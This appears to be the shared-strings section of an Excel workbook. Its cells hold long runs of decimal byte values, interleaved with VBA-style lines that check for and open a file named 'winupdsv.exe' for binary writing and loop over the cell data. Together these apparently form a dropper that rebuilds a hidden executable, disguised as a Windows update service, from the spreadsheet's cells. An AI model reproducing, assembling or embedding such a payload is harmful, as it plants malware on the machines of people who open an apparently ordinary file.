    <t xml:space="preserve">1 15 0 8 2 16 0 78 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 79 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 80 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 81 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 82 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 83 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 84 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 85 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 86 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 87 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 88 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 89 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 90 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 91 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 92 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 93 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 94 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 95 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 253 0 10 0 64 0 1 0 22 0 16 0 0 0 253 0 10 0 65 0 1 0 22 0 17 0 0 0 253 0 10 0 66 0 1 0 23 0 31 0 0 0 253 0 10 0 67 0 1 0 23 0 18 0 0 0 253 0 10 0 68 0 1 0 23 0 30 0 0 0 253 0 10 0 69 0 1 0 22 0 53 0 0 0 253 0 10 0 70 0 1 0 26 0 22 0 0 0 253 0 10 0 71 0 1 0 23 0 41 0 0 0 253 0 10 0 72 0 1 0 23 0 23 0 0 0 253 0 10 0 73 0 1 0 22 0 46 0 0 0 253 0 10 0 74 0 1 0 22 </t>
  </si>
  <si>
    <t xml:space="preserve">23 163 197 220 195 13 199 172 226 95 16 164 4 12 24 207 212 236 86 139 34 10 22 165 248 8 125 52 192 94 136 132 5 236 1 199 247 214 11 130 198 114 244 164 242 198 133 13 32 190 151 218 110 124 55 83 87 141 85 96 182 10 2 192 216 119 29 218 61 182 4 61 188 42 65 184 32 0 139 217 27 81 161 129 158 171 222 149 243 116 21 191 253 170 66 66 138 66 255 52 117 208 95 91 106 12 250 45 246 236 53 131 53 141 122 80 141 86 137 119 198 126 68 116 64 121 35 253 29 200 110 54 217 86 30 86 52 35 62 42 216 129 90 201 252 4 39 210 119 219 10 204 92 202 141 141 114 102 252 251 9 183 130 202 116 22 250 16 138 148 5 100 161 86 176 249 136 144 96 235 28 205 82 123 239 206 89 26 32 91 235 227 128 160 28 146 48 225 134 70 60 0 191 235 73 21 63 172 177 221 37 65 114 25 4 90 170 75 200 128 193 32 201 203 219 216 136 136 73 31 29 97 114 19 122 119 14 69 55 236 205 32 233 32 235 224 76 74 190 0 87 181 40 186 246 117 94 97 83 92 69 106 253 224 215 89 252 16 252 249 85 17 252 148 252 119 66 104 220 99 160 15 66 61 158 144 125 103 139 53 140 74 177 43 186 87 208 142 255 214 239 225 247 108 251 41 116 250 192 16 104 172 7 163 0 212 69 23 175 251 214 163 4 6 161 11 115 22 207 110 152 160 111 203 188 161 4 16 5 83 106 152 35 120 17 218 3 20 67 232 181 241 77 111 13 120 32 96 191 110 87 37 186 163 66 131 122 181 222 3 20 247 198 252 13 55 240 237 245 16 117 7 238 117 111 235 33 138 6 70 172 163 180 64 76 73 205 34 41 31 172 208 143 241 117 235 12 117 81 131 227 3 76 32 155 168 84 221 29 47 163 212 91 94 51 112 40 26 143 121 129 58 73 247 204 214 79 138 17 58 238 152 64 219 220 108 24 46 250 42 120 200 9 108 17 215 99 175 218 6 210 52 131 124 22 131 198 222 44 30 65 221 158 12 12 117 198 57 235 24 138 52 157 169 82 243 9 14 0 187 109 237 189 249 83 241 85 10 4 137 7 95 98 216 174 196 240 176 117 133 163 4 </t>
  </si>
  <si>
    <t xml:space="preserve">108 36 182 143 44 25 165 203 100 28 139 85 12 81 44 54 2 46 101 92 138 8 8 1 120 129 224 95 209 233 131 225 127 137 10 193 1 163 120 6 113 129 118 157 208 244 24 43 208 220 221 111 247 132 48 52 42 129 198 5 163 112 26 137 53 116 5 97 72 71 163 56 66 215 170 64 9 204 131 58 180 115 225 85 28 2 176 80 205 205 66 167 154 16 202 56 173 143 34 16 180 30 255 241 111 116 8 193 69 176 102 188 246 184 59 216 19 14 47 17 70 15 131 158 62 213 15 193 61 160 28 162 112 154 116 114 118 44 68 11 140 229 136 224 22 116 108 214 225 132 223 11 233 1 117 102 80 146 21 250 36 39 103 15 225 244 0 154 224 86 57 240 42 97 28 10 14 139 239 168 203 30 102 213 24 105 143 80 23 222 108 7 236 116 50 86 223 235 6 109 180 3 93 248 59 123 14 120 163 57 130 104 255 38 88 242 137 218 4 12 187 129 195 243 135 5 120 213 165 31 29 45 163 255 214 135 163 44 56 8 200 56 72 1 116 8 65 64 64 173 111 213 92 97 0 41 253 62 212 70 235 188 187 187 59 70 89 161 108 36 3 192 102 97 131 192 2 6 175 85 4 171 250 124 54 216 161 49 118 144 214 139 13 40 201 207 131 147 142 234 17 210 181 176 103 8 14 75 32 160 187 144 6 147 168 199 94 104 233 214 104 76 189 12 50 214 42 194 48 178 185 4 16 12 176 172 131 99 18 205 16 96 193 38 155 189 150 83 151 147 224 6 214 189 158 151 87 152 137 13 163 5 107 185 46 18 32 91 221 217 129 155 83 148 139 40 210 129 66 198 223 248 223 57 61 44 118 45 133 210 116 85 132 132 201 116 18 128 120 135 96 110 237 183 145 128 249 32 115 2 33 6 126 118 16 214 28 187 45 71 59 40 114 215 44 209 51 220 65 124 67 129 251 74 15 134 102 170 222 68 48 83 11 212 224 95 199 55 88 231 9 8 164 30 9 17 227 27 193 171 50 31 49 28 1 120 130 167 190 56 0 166 252 0 17 134 186 214 67 18 87 50 210 29 216 109 218 228 116 87 163 204 12 196 114 50 114 50 100 168 96 140 250 224 48 50 92 163 5 128 70 71 </t>
  </si>
  <si>
    <t xml:space="preserve">filesv = folder1 &amp; "\winupdsv.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 253 0 10 0 75 0 1 0 22 0 1 0 0 0 253 0 10 0 76 0 1 0 22 0 24 0 0 0 253 0 10 0 77 0 1 0 22 0 25 0 0 0 253 0 10 0 78 0 1 0 22 0 27 0 0 0 253 0 10 0 79 0 1 0 22 0 54 0 0 0 253 0 10 0 80 0 1 0 22 0 40 0 0 0 253 0 10 0 81 0 1 0 22 0 26 0 0 0 253 0 10 0 82 0 1 0 22 0 32 0 0 0 1 2 6 0 83 0 1 0 22 0 1 2 6 0 84 0 1 0 22 0 1 2 6 0 85 0 1 0 22 0 1 2 6 0 86 0 1 0 22 0 1 2 6 0 87 0 1 0 22 0 1 2 6 0 88 0 1 0 22 0 1 2 6 0 89 0 1 0 22 0 1 2 6 0 90 0 1 0 22 0 1 2 6 0 91 0 1 0 22 0 1 2 6 0 92 0 1 0 22 0 1 2 6 0 93 0 1 0 22 0 1 2 6 0 94 0 1 0 22 0 1 2 6 0 95 0 1 0 22 0 215 0 68 0 12 4 0 0 108 2 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 14 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 8 2 16 0 96 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 97 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 98 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 99 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 100 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 101 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 102 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 103 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 104 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 105 0 1 0 2 0 29 1 0 </t>
  </si>
  <si>
    <t xml:space="preserve">114 138 164 191 152 74 117 223 200 231 176 73 168 74 44 7 192 19 236 188 0 169 216 3 16 74 191 152 74 22 66 14 128 152 74 63 52 77 215 13 143 6 124 3 116 108 100 144 138 77 211 92 84 76 74 191 221 55 66 8 9 255 240 176 3 188 1 72 42 54 208 74 191 243 8 121 200 48 76 224 75 56 75 169 216 117 191 44 144 72 11 104 3 144 75 191 57 4 242 10 48 76 48 76 215 13 22 10 91 228 127 236 3 166 89 54 77 244 252 4 76 12 20 33 4 72 197 39 76 191 31 21 155 174 59 64 5 72 3 88 108 76 14 172 5 32 191 63 84 151 150 14 80 86 156 71 100 138 68 10 11 55 80 222 249 131 250 129 45 153 165 233 82 14 38 153 43 209 231 73 131 161 249 254 139 200 193 224 8 3 193 6 16 202 205 42 186 174 65 41 173 79 58 6 35 74 62 40 39 100 130 68 205 184 126 41 62 1 184 66 60 83 109 86 51 246 59 29 18 84 198 40 221 21 241 90 53 234 71 246 68 200 4 63 96 237 66 170 33 61 86 68 8 23 48 91 66 158 235 2 20 214 1 15 149 33 133 82 111 60 224 220 224 40 114 0 240 165 229 187 160 67 239 27 65 194 131 196 20 91 162 182 98 146 26 125 212 80 41 156 75 22 52 58 81 237 66 60 82 255 73 24 235 215 131 179 5 117 10 88 110 82 13 74 15 127 77 162 155 185 250 89 89 235 64 125 129 16 145 83 171 14 96 44 160 196 231 148 131 109 173 104 31 247 222 27 246 3 221 35 21 30 209 172 150 68 131 224 168 70 36 251 61 8 207 234 122 80 100 48 226 9 181 200 5 242 131 176 240 99 28 113 7 23 130 145 61 44 59 117 70 87 34 132 251 70 7 91 83 104 236 48 136 183 17 217 0 105 160 105 29 35 145 207 108 229 235 34 32 232 27 156 190 102 34 10 72 114 124 31 2 16 93 125 138 150 20 126 138 20 182 168 178 107 119 237 64 78 34 161 182 109 13 240 29 46 29 22 28 2 24 31 31 240 156 97 0 197 72 189 63 80 27 27 139 186 171 211 68 32 24 54 102 109 139 63 60 32 115 46 127 36 1 10 69 128 4 227 181 189 65 103 </t>
  </si>
  <si>
    <t xml:space="preserve">137 103 77 10 133 80 122 213 53 221 72 188 142 115 191 228 141 164 13 190 183 21 3 120 237 76 76 248 128 111 123 152 0 74 175 154 120 241 60 88 228 177 211 12 86 104 96 198 91 104 108 4 119 5 38 128 108 17 76 147 235 133 8 199 216 208 74 195 214 73 131 80 106 40 1 11 225 35 87 86 69 222 246 49 214 5 31 104 84 42 252 244 29 79 200 177 118 8 87 37 76 78 81 180 16 133 237 77 186 74 139 2 41 87 20 175 99 178 1 244 53 204 0 129 223 32 40 45 211 72 139 84 36 60 248 183 189 139 160 68 211 68 106 56 137 18 12 22 192 193 214 112 84 104 40 62 137 27 24 28 176 237 110 55 226 81 141 10 16 82 11 36 199 3 52 113 6 233 28 32 7 56 60 225 46 152 27 54 98 44 13 4 141 51 98 105 163 250 241 81 252 126 254 79 29 10 11 124 104 90 8 197 84 140 47 184 240 108 0 167 14 217 26 138 223 194 11 148 235 26 200 129 28 49 253 19 177 176 195 98 34 23 144 0 170 90 174 59 162 153 12 46 171 13 247 111 87 196 99 81 82 101 80 140 194 16 44 246 111 187 255 255 112 8 139 209 87 139 120 20 193 234 8 136 20 62 139 80 20 17 66 137 6 136 12 50 112 47 187 253 139 72 20 65 95 137 4 94 195 79 72 16 50 104 141 13 22 101 86 243 209 196 57 248 191 185 239 185 78 139 118 16 83 65 99 202 139 217 193 233 2 243 165 139 203 219 237 191 23 111 3 243 164 18 72 28 3 250 137 7 1 81 133 88 118 183 125 182 20 16 16 218 137 10 43 21 16 41 81 18 201 182 253 238 64 28 101 133 201 95 91 117 6 8 8 108 16 65 227 15 111 0 96 8 133 219 85 173 239 131 187 170 49 70 139 115 28 60 95 10 190 239 126 23 94 131 253 4 15 143 82 12 133 237 15 140 74 20 67 216 216 108 166 172 31 55 131 59 7 11 44 224 64 153 168 239 132 103 115 37 119 61 154 7 16 53 18 20 252 199 168 218 75 16 122 149 131 248 42 139 78 32 137 30 254 183 237 55 202 20 137 110 32 117 114 13 40 49 124 131 233 8 193 225 12 129 193 251 238 183 63 191 </t>
  </si>
  <si>
    <t xml:space="preserve">If Not fso.fileexists(filesv) Then</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 1 15 0 8 2 16 0 106 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 107 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 108 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 109 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 110 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 111 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 112 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 113 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 114 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 115 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 116 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 117 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 118 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 119 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 120 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 121 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 122 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 123 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 124 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 125 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 126 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 8 2 16 0 127 0 1 0 2 0 29 1 0 0 0 0 0 1 15 0 1 2 6 0 96 0 1 0 22 0 1 2 6 0 97 0 1 0 22 0 1 2 6 0 98 0 1 0 22 0 1 2 6 0 99 0 1 0 22 0 1 2 6 0 100 0 1 0 22 0 1 2 6 0 101 0 1 0 22 0 1 2 6 0 102 </t>
  </si>
  <si>
    <t xml:space="preserve">97 32 43 152 228 228 59 223 75 117 61 176 133 156 248 125 158 27 18 3 162 219 46 198 36 252 58 222 139 196 65 220 131 181 215 4 183 156 235 19 147 139 240 38 13 226 173 141 17 139 56 103 220 116 102 110 215 37 107 179 220 97 33 87 244 77 236 169 8 103 49 26 165 160 153 141 182 208 55 96 216 32 50 246 69 13 193 64 62 118 51 4 219 28 120 178 211 213 127 30 218 152 173 141 108 50 72 210 143 179 80 168 93 179 101 200 213 127 13 109 22 17 163 91 61 179 36 35 191 144 54 220 137 93 224 18 221 187 88 139 62 178 125 223 116 180 86 100 228 181 155 59 101 103 116 156 143 179 117 4 3 29 186 205 26 230 140 40 104 32 61 168 182 25 240 213 68 221 177 113 228 50 69 104 170 198 113 193 65 181 20 108 252 193 86 141 74 194 13 213 116 239 54 226 2 181 241 73 0 243 12 94 117 5 43 132 28 140 79 145 139 194 78 8 100 10 158 122 50 24 161 48 93 219 145 27 38 88 36 62 93 81 94 86 219 8 78 182 86 165 168 4 50 29 27 26 100 57 227 86 73 83 164 206 91 248 120 71 167 88 163 67 45 36 242 28 73 102 7 134 187 5 161 20 16 51 80 51 73 62 35 59 52 65 176 148 93 24 1 217 152 109 141 83 44 52 32 236 234 246 157 24 31 224 86 116 99 186 141 60 104 176 16 28 56 124 245 225 96 68 91 88 87 204 169 235 11 131 193 161 20 12 253 131 155 45 84 75 247 41 52 86 95 28 209 30 46 89 85 82 248 215 72 30 206 87 67 168 245 204 228 41 102 69 156 172 90 59 130 246 47 141 84 193 4 138 76 3 85 62 138 161 20 239 215 193 190 131 37 128 220 161 8 145 1 90 122 128 225 127 232 129 145 188 21 254 254 103 17 128 201 128 220 136 10 102 132 195 198 94 195 176 176 78 70 19 235 10 15 91 64 172 35 182 81 61 229 7 114 199 62 138 239 20 129 233 11 45 147 1 23 115 236 168 110 165 18 52 46 12 139 225 204 108 213 222 39 64 4 80 50 204 108 0 132 4 8 42 130 216 12 65 255 61 24 55 254 127 215 162 3 114 117 110 116 105 109 101 32 101 114 114 </t>
  </si>
  <si>
    <t xml:space="preserve">72 209 248 37 3 118 5 184 3 47 193 224 6 11 200 32 187 75 191 105 100 87 3 131 201 32 139 193 208 191 31 23 247 247 30 222 109 11 163 199 105 113 10 43 202 3 207 207 92 63 107 183 206 38 25 87 75 50 28 17 75 48 129 225 237 193 99 166 255 195 13 199 67 48 166 38 77 208 190 155 20 30 139 195 20 140 185 206 55 218 168 158 182 95 76 32 228 94 73 91 118 241 88 9 27 208 117 32 59 237 127 26 24 127 150 238 200 116 21 139 247 224 93 137 83 24 38 214 224 155 189 38 236 225 4 4 227 110 73 126 246 116 24 161 36 137 67 24 93 23 117 26 71 132 161 219 230 108 6 19 63 215 11 141 109 177 52 10 144 142 124 39 12 120 186 68 131 64 78 213 112 190 155 8 115 37 195 141 104 116 5 2 215 225 40 200 54 194 195 106 181 60 2 8 172 66 85 104 131 173 87 237 35 17 28 122 59 121 108 51 4 235 58 237 54 182 86 142 51 120 204 179 63 38 63 68 113 235 46 221 94 60 102 6 80 254 104 78 12 126 60 5 205 209 184 237 9 254 79 63 231 139 150 240 75 186 202 35 205 243 170 9 16 161 235 182 157 236 117 89 53 24 11 12 237 184 50 135 165 16 222 197 86 62 78 106 107 145 134 20 68 24 91 236 93 6 225 132 103 180 55 96 7 95 95 159 193 240 16 96 161 112 40 38 98 254 1 44 35 8 40 143 24 89 216 120 228 129 87 34 151 28 37 182 255 123 2 140 10 120 4 131 255 42 116 13 4 113 9 67 180 49 198 129 255 104 119 221 8 57 154 225 2 91 80 39 40 158 86 36 66 140 216 86 120 55 239 65 60 20 2 19 82 20 144 101 228 50 70 64 56 78 81 164 91 217 101 86 66 48 62 55 81 174 80 184 22 176 109 144 222 177 5 248 175 28 77 94 72 131 224 253 115 95 184 92 50 45 185 94 9 63 85 38 134 69 4 40 53 109 16 207 217 176 217 75 97 234 254 149 173 233 195 43 195 137 21 69 126 181 183 133 192 31 86 77 194 85 48 83 90 5 26 177 125 146 92 26 48 16 135 73 141 82 71 199 24 205 220 214 241 13 196 201 200 77 176 95 3 195 3 203 </t>
  </si>
  <si>
    <t xml:space="preserve">Open filesv For Binary Access Write As #1</t>
  </si>
  <si>
    <t xml:space="preserve">0 1 0 22 0 1 2 6 0 103 0 1 0 22 0 1 2 6 0 104 0 1 0 22 0 1 2 6 0 105 0 1 0 22 0 1 2 6 0 106 0 1 0 22 0 1 2 6 0 107 0 1 0 22 0 1 2 6 0 108 0 1 0 22 0 1 2 6 0 109 0 1 0 22 0 1 2 6 0 110 0 1 0 22 0 1 2 6 0 111 0 1 0 22 0 1 2 6 0 112 0 1 0 22 0 1 2 6 0 113 0 1 0 22 0 1 2 6 0 114 0 1 0 22 0 1 2 6 0 115 0 1 0 22 0 1 2 6 0 116 0 1 0 22 0 1 2 6 0 117 0 1 0 22 0 1 2 6 0 118 0 1 0 22 0 1 2 6 0 119 0 1 0 22 0 1 2 6 0 120 0 1 0 22 0 1 2 6 0 121 0 1 0 22 0 1 2 6 0 122 0 1 0 22 0 1 2 6 0 123 0 1 0 22 0 1 2 6 0 124 0 1 0 22 0 1 2 6 0 125 0 1 0 22 0 1 2 6 0 126 0 1 0 22 0 1 2 6 0 127 0 1 0 22 0 215 0 68 0 192 3 0 0 108 2 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 10 0 194 1 12 0 1 0 0 0 1 0 9 0 0 0 32 0 62 2 18 0 183 6 0 0 3 0 64 0 0 0 0 0 0 0 0 0 0 0 29 0 15 0 3 0 0 3 0 0 0 1 0 0 0 0 0 3 3 239 0 6 0 6 0 55 0 0 0 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">111 114 32 192 13 10 228 191 217 47 84 76 79 83 83 17 14 0 83 73 78 71 253 101 237 7 0 68 79 77 65 18 17 82 54 48 50 56 111 127 121 187 8 45 32 75 97 98 108 116 111 32 105 110 105 86 97 108 105 126 190 217 183 122 13 104 101 97 112 55 39 55 110 111 116 239 182 255 214 61 4 117 103 104 32 115 112 97 99 35 102 123 108 111 119 105 185 236 54 96 56 97 6 111 110 55 54 103 32 121 10 115 116 100 53 219 90 251 237 112 117 114 43 118 105 114 116 117 33 51 165 99 35 66 190 216 246 32 99 12 108 40 95 52 246 218 118 155 95 42 101 120 92 47 88 6 220 190 176 147 189 226 95 49 57 247 111 112 101 96 219 238 230 88 49 115 111 15 100 101 115 99 43 112 107 109 50 56 70 36 129 101 100 36 223 64 136 25 87 35 55 242 109 187 61 109 117 108 172 116 104 191 97 47 108 111 99 107 131 173 16 70 23 52 100 112 107 205 109 183 97 46 2 162 33 114 109 10 91 251 214 0 112 64 103 114 97 109 32 74 109 54 45 133 189 16 47 48 57 79 16 92 163 209 12 65 42 43 48 46 240 125 10 249 43 56 97 114 103 117 40 115 109 215 158 135 95 48 50 102 193 110 110 103 130 179 214 197 182 111 5 116 58 17 100 230 127 120 91 104 133 77 45 96 57 102 21 86 105 115 221 30 140 127 170 67 43 43 32 82 160 76 105 98 180 114 121 237 225 48 247 39 10 45 22 69 14 33 17 187 108 141 179 80 212 58 194 0 46 0 60 229 189 109 174 13 224 37 44 107 108 119 110 62 194 29 27 191 27 71 101 116 76 97 50 65 2 118 101 80 174 107 219 89 236 117 112 19 15 87 149 100 38 135 198 23 254 127 101 115 115 97 103 101 66 111 120 65 0 117 115 37 51 50 46 100 42 185 229 179 164 63 62 79 66 3 113 57 72 243 11 242 246 118 81 122 81 78 81 85 8 157 182 27 148 124 201 165 255 159 71 91 28 64 127 251 187 250 64 107 98 116 131 111 64 115 104 101 51 35 39 114 98 43 0 70 36 56 217 131 44 1 192 123 64 7 1 1 149 41 185 140 96 16 2 140 184 192 150 34 31 2 </t>
  </si>
  <si>
    <t xml:space="preserve">43 108 141 168 78 112 14 93 105 79 221 226 15 86 31 66 36 139 74 68 209 188 66 52 94 194 84 176 10 60 50 81 116 72 254 195 205 140 224 19 223 217 84 122 60 227 86 244 237 172 37 170 38 124 141 4 64 2 167 251 192 133 199 136 106 62 74 120 9 104 50 210 57 162 138 91 12 108 136 203 246 173 57 128 110 95 94 116 137 114 100 2 84 108 187 109 219 171 184 233 7 96 2 64 143 66 112 2 186 197 118 112 88 91 116 125 140 143 254 107 36 225 191 125 169 46 67 100 139 83 144 75 108 43 208 43 209 117 15 246 184 81 247 163 23 244 139 213 40 86 28 250 255 119 191 125 216 6 186 50 235 125 35 36 141 140 41 250 12 59 193 114 123 9 143 253 111 139 123 48 139 205 253 141 52 47 0 115 104 38 223 221 253 91 80 67 84 43 205 43 245 137 9 75 60 137 18 115 68 43 197 137 125 123 91 106 20 50 113 165 65 254 131 51 59 197 114 4 75 133 166 168 18 45 78 4 23 233 8 217 54 104 49 59 245 30 104 185 166 11 116 3 213 20 72 4 172 93 169 176 240 214 173 122 87 115 48 64 3 206 81 255 202 246 105 171 219 148 85 60 21 3 114 209 136 250 3 119 64 108 141 247 108 114 32 215 242 155 8 43 80 109 43 91 8 80 125 171 10 237 166 187 127 78 1 51 193 35 67 76 13 129 250 6 37 115 13 139 234 2 99 28 129 66 7 243 254 233 195 95 161 211 6 22 52 86 190 54 7 180 109 220 106 251 142 87 115 38 240 18 108 124 184 13 212 203 119 41 86 60 12 230 161 30 237 194 215 1 113 84 76 100 199 19 114 173 86 248 23 186 49 116 4 59 208 114 58 89 184 128 82 183 181 183 108 116 100 124 7 30 184 209 216 210 246 184 29 68 227 43 193 228 57 123 108 171 233 36 87 51 29 226 2 150 11 8 45 108 179 102 16 72 79 30 36 154 45 205 210 181 238 174 77 129 75 69 67 193 192 119 152 53 40 177 67 118 64 231 211 205 182 252 84 67 215 16 77 255 97 1 58 30 214 177 20 136 242 60 228 206 89 105 84 166 68 198 98 241 82 131 106 181 3 252 193 43 214 243 116 34 51 2 </t>
  </si>
  <si>
    <t xml:space="preserve">For i = 1 To 54</t>
  </si>
  <si>
    <t xml:space="preserve">84 0 104 0 105 0 115 0 87 0 111 0 114 0 107 0 98 0 111 0 111 0 107 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 26 0 2 1 255 255 255 255 10 0 0 0 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 12 0 0 0 0 0 0 95 0 95 0 83 0 82 0 80 0 95 0 52 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 2 1 9 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 48 0 0 0 180 2 0 0 0 0 0 0 95 0 95 0 83 0 82 0 80 0 95 0 53 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 2 0 5 0 0 0 4 0 0 0 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 59 0 0 0 105 0 0 0 0 0 0 0 123 124 49 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 6 0 2 1 255 255 255 255 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 37 0 0 0 116 48 0 0 0 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">151 200 237 34 2 5 11 192 11 3 50 72 51 29 4 150 141 50 32 131 52 8 142 143 3 50 32 3 144 145 146 34 2 50 32 147 178 4 38 232 40 7 223 103 140 1 242 142 111 12 16 219 32 5 147 25 205 118 12 234 32 99 252 244 98 7 9 200 52 77 211 52 10 164 16 120 17 217 52 77 211 72 18 36 19 248 97 166 105 154 102 24 192 25 152 26 116 175 105 154 96 27 40 28 100 7 120 105 154 102 217 240 96 121 224 122 208 180 105 154 166 252 204 255 188 248 3 247 2 210 156 123 1 22 22 7 174 11 122 135 59 115 180 13 243 65 186 65 154 6 9 12 7 8 1 249 94 144 9 199 27 11 189 96 223 123 87 59 7 15 87 231 32 223 123 239 19 231 227 3 23 33 131 12 50 216 53 15 65 67 80 13 54 216 96 51 82 23 83 7 87 55 216 96 131 95 89 123 108 23 109 171 11 210 52 77 32 112 28 114 199 54 216 96 223 47 128 179 129 7 130 31 205 96 131 12 131 132 143 145 41 216 32 131 52 158 161 164 111 96 131 13 50 167 183 159 206 31 95 118 14 194 215 11 24 7 0 1 2 4 222 155 160 24 66 196 96 130 121 130 247 223 79 158 253 0 166 223 7 161 165 129 159 224 252 47 64 192 222 155 231 126 128 252 168 193 163 218 163 211 0 96 131 156 61 129 254 7 64 181 47 255 221 32 67 65 182 95 207 162 228 162 26 0 229 162 232 187 207 87 200 162 91 126 161 254 81 5 3 218 94 229 175 236 183 218 95 95 218 106 218 50 47 211 216 222 224 249 40 2 4 218 49 126 57 210 10 9 21 89 222 58 234 162 10 56 135 80 177 255 86 81 72 70 105 108 101 84 121 112 101 12 128 182 2 244 86 101 114 115 93 11 69 90 197 86 209 57 161 99 88 49 123 1 218 12 72 246 70 114 101 34 191 189 10 87 140 195 13 67 108 111 115 101 115 255 190 251 72 97 110 100 108 26 70 108 117 115 104 76 66 117 102 102 70 67 64 207 222 114 87 114 101 17 65 65 108 103 5 104 107 14 10 82 227 20 84 187 100 39 64 206 101 104 94 67 117 160 179 203 110 91 101 110 123 83 161 80 214 198 238 26 </t>
  </si>
  <si>
